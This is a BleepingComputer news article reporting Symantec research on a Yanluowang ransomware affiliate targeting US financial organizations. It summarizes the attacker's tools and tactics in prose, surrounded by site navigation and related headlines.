Panasonic discloses data breach after network hack
IKEA email systems hit by ongoing cyberattack
APT37 targets journalists with Chinotto multi-platform malware
Stealthy WIRTE hackers target governments in the Middle East
Android banking malware infects 300,000 Google Play users
DNA testing firm discloses data breach affecting 2.1 million people
8-year-old HP printer vulnerability affects 150 printer models
This Cisco network certification training is 70% off for Cyber Monday
Qualys BrowserCheck
Junkware Removal Tool
How to remove the PBlock+ adware browser extension
Remove the Search Redirect
Remove the Search Redirect
Remove the Search Redirect
Remove Security Tool and SecurityTool (Uninstall Guide)
How to remove Antivirus 2009 (Uninstall Instructions)
How to Remove WinFixer / Virtumonde / Msevents / Trojan.vundo
How to remove Google Redirects or the TDSS, TDL3, or Alureon rootkit using TDSSKiller
Locky Ransomware Information, Help Guide, and FAQ
CryptoLocker Ransomware Information Guide and FAQ
CryptorBit and HowDecrypt Information Guide and FAQ
CryptoDefense and How_Decrypt Ransomware Information Guide and FAQ
How to make the Start menu full screen in Windows 10
How to install the Microsoft Visual C++ 2015 Runtime
How to open an elevated PowerShell Admin prompt in Windows 10
How to Translate a Web Page in Google Chrome
How to start Windows in Safe Mode
How to remove a Trojan, Virus, Worm, or other Malware
How to show hidden files in Windows 7
How to see hidden files in Windows
IT Certification Courses
Gear + Gadgets

An affiliate of the recently discovered Yanluowang ransomware operation is focusing its attacks on U.S. organizations in the financial sector using BazarLoader malware in the reconnaissance stage.
Based on observed tactics, techniques, and procedures, the threat actor is experienced with ransomware-as-a-service (RaaS) operations and may be linked with the Fivehands group.
Researchers at Symantec, a division of Broadcom Software, note that the actor has been hitting higher-profile targets in the U.S. since at least August.
While its interest is in financial institutions, the Yanluowang ransomware affiliate has also targeted companies in the manufacturing, IT services, consultancy, and engineering sectors.
Looking at the tactics, techniques, and procedures (TTPs), the researchers noticed a possible connection to older attacks with the Thieflock, a ransomware operation developed by the Fivehands group.
Fivehands ransomware itself is relatively new on the scene, becoming known in April – first in a report from Mandiant, who is tracking its developer as UNC2447, and then in an alert from CISA.
At the time, Mandiant said that UNC2447 showed “advanced capabilities to evade detection and minimize post-intrusion forensics,” and that its affiliates had been deploying RagnarLocker ransomware.
Symantec notes that the link found between recent Yanluowang attacks and older ones with Thieflock is tentative, as it relies on several TTPs found in Fivehands ransomware attacks, such as:
“This link begs the question of whether Yanluowang was developed by Canthroid [a.k.a. Fivehands]. However, analysis of Yanluowang and Thieflock does not provide any evidence of shared authorship. Instead, the most likely hypothesis is that these Yanluowang attacks may be carried out by a former Thieflock affiliate,” the researchers say.
After gaining access to the target network, the attacker uses PowerShell to download tools, such as the BazarLoader malware to help with moving laterally.
BazarLoader is delivered to corporate targets by the TrickBot botnet, which also spreads Conti ransomware. More recently, TrickBot operators started to help rebuilding the Emotet botnet.
The Yanluowang threat actor enables the remote desktop service (RDP) from the registry and installs the ConnectWise tool for remote access.
The researchers say that the affiliate discovers systems of interest with the AdFind tool – to query the Active Directory, and SoftPerfect Network Scanner – to find hostnames and network services.
Several tools are used to steal credentials from the browsers (Firefox, Chrome, Internet Explorer) of compromised machines: GrabFF, GrabChrome, BrowserPassView.
Symantec’s researchers also noticed that the attacker used KeeThief to steal the master key for the KeePass password manager, a screen capture tool, and the data exfiltration utility Filegrab.
In a previous report about Yanluowang attacks, the company said that the hackers threatened with distributed denial-of-service (DDoS) and data wiping attacks if the victim did not comply with the demands.
Today’s report on the Yanluowang affiliate includes indicators of compromise for the tools and malware used in the attack.
U.S. offers $10 million reward for leaders of REvil ransomware
REvil ransomware affiliates arrested in Romania and Kuwait
New Yanluowang ransomware used in targeted enterprise attacks
Marine services provider Swire Pacific Offshore hit by ransomware
Magniber ransomware gang now exploits Internet Explorer flaws in attacks
Not a member yet? Register Now
Customize the Windows 11 experience with these free apps
Panasonic discloses data breach after network hack
To receive periodic updates and news from BleepingComputer, please use the form below.
Terms of Use Privacy PolicyEthics Statement
Copyright @ 2003 – 2021 Bleeping Computer® LLC – All Rights Reserved
Not a member yet? Register Now
Read our posting guidelinese to learn what content is prohibited.


You May Also Like

TellYouThePass ransomware revived in Linux, Windows Log4j attacks

TellYouThePass ransomware revived in Linux, Windows Log4j attacksCredit card info of 1.8…

Alibaba ECS instances actively hijacked by cryptomining malware

New Microsoft emergency updates fix Windows Server auth issues7 million Robinhood user…

EwDoor botnet targets AT&T network edge devices at US firms

FBI seized $2.3M from affiliate of REvil, Gandcrab ransomware gangsEwDoor botnet targets…

Microsoft adds AI-driven ransomware protection to Defender

Windows 10 21H2 is released, here are the new featuresNew Rowhammer technique…